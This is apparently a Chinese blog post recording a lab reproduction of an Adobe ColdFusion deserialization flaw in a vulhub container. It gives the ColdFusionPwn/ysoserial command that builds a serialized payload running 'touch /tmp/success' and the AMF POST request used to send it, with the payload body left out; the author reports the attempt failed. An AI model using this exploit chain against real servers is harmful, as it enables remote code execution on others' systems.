Adobe ColdFusion 反序列化漏洞
0x01.环境搭建
利用vulhub搭建漏洞环境
service docker start
docker-compose up -d
查看开启的端口号
docker-compose ps
访问http://target_ip:8500/CFIDE/administrator/index.cfm
输入密码vulhub
,即可成功安装Adobe ColdFusion
0x02.漏洞复现
我们使用ColdFusionPwn工具来生成POC
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/success' poc.ser
我执行的时候出现了这样的错误,但kali上可以生成payload
使用past from file
来给burp添加payload
文件头如下,要用Content-Type: application/x-amf
POST /flex2gateway/amf HTTP/1.1
Host: target_ip:8500
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-amf
Content-Length: 2853
[...poc...]
但结果是失败的,总是无法执行命令,希望有大佬解惑
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。